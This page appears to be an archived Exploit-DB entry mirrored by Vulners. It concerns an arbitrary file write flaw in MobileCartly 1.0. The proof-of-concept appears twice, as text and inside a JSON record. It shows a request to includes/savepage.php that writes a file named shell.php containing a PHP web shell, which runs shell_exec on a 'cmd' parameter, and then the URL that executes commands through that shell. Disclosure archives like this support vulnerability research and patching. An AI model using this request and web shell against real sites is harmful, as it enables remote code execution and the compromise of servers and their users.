Search...

MobileCartly 1.0 - Arbitrary File Write Vulnerability

2012-08-10T00:00:00

ID EDB-ID:20422
Type exploitdb
Reporter Yakir Wizman
Modified 2012-08-10T00:00:00

Description

MobileCartly 1.0 - Arbitrary File Write Vulnerability. Webapps exploit for php platform

                                        
                                            # -----------------------------------------------------------
#			   _____ _ _            _      _ 
#			  / ____(_) |          | |    | |
#			 | |     _| |_ __ _  __| | ___| |
#			 | |    | | __/ _` |/ _` |/ _ \ |
#			 | |____| | || (_| | (_| |  __/ |
#			  \_____|_|\__\__,_|\__,_|\___|_|
#			  
# -----------------------------------------------------------
# MobileCartly 1.0 Arbitrary File Write Vulnerability
# Bug discovered by Yakir Wizman AKA Pr0T3cT10n, &lt;yakir.wizman@gmail.com&gt;
# Date 10/08/2012
# Download - http://mobilecartly.com/mobilecartly.zip
# ISRAEL
# -----------------------------------------------------------
#		Author will be not responsible for any damage.
# -----------------------------------------------------------
# I. DESCRIPTION
# -----------------------------------------------------------
# The application is prone to arbitrary file write / overwrite vulnerability.
#
# -----------------------------------------------------------
# II. PoC EXPLOIT
# -----------------------------------------------------------
# http://127.0.0.1/mobilecartly/includes/savepage.php?savepage=FILENAME&pagecontent=CODE
# FILENAME for example 'shell.php'
# CODE for example '&lt;?php echo(shell_exec($_GET['cmd'])); ?&gt;'
# Result example http://127.0.0.1/mobilecartly/pages/shell.php?cmd=dir
# -----------------------------------------------------------

JSON Vulners Source

Initial Source

{"id": "EDB-ID:20422", "type": "exploitdb", "bulletinFamily": "exploit", "title": "MobileCartly 1.0 - Arbitrary File Write Vulnerability", "description": "MobileCartly 1.0 - Arbitrary File Write Vulnerability. Webapps exploit for php platform", "published": "2012-08-10T00:00:00", "modified": "2012-08-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/20422/", "reporter": "Yakir Wizman", "references": [], "cvelist": [], "lastseen": "2016-02-02T14:13:26", "viewCount": 2, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-02-02T14:13:26", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-02T14:13:26", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://www.exploit-db.com/download/20422/", "sourceData": "# -----------------------------------------------------------\r\n#\t\t\t _____ _ _ _ _ \r\n#\t\t\t / ____(_) | | | | |\r\n#\t\t\t | | _| |_ __ _ __| | ___| |\r\n#\t\t\t | | | | __/ _` |/ _` |/ _ \\ |\r\n#\t\t\t | |____| | || (_| | (_| | __/ |\r\n#\t\t\t \\_____|_|\\__\\__,_|\\__,_|\\___|_|\r\n#\t\t\t \r\n# -----------------------------------------------------------\r\n# MobileCartly 1.0 Arbitrary File Write Vulnerability\r\n# Bug discovered by Yakir Wizman AKA Pr0T3cT10n, <yakir.wizman@gmail.com>\r\n# Date 10/08/2012\r\n# Download - http://mobilecartly.com/mobilecartly.zip\r\n# ISRAEL\r\n# -----------------------------------------------------------\r\n#\t\tAuthor will be not responsible for any damage.\r\n# -----------------------------------------------------------\r\n# I. DESCRIPTION\r\n# -----------------------------------------------------------\r\n# The application is prone to arbitrary file write / overwrite vulnerability.\r\n#\r\n# -----------------------------------------------------------\r\n# II. PoC EXPLOIT\r\n# -----------------------------------------------------------\r\n# http://127.0.0.1/mobilecartly/includes/savepage.php?savepage=FILENAME&pagecontent=CODE\r\n# FILENAME for example 'shell.php'\r\n# CODE for example '<?php echo(shell_exec($_GET['cmd'])); ?>'\r\n# Result example http://127.0.0.1/mobilecartly/pages/shell.php?cmd=dir\r\n# -----------------------------------------------------------", "osvdbidlist": ["85509"]}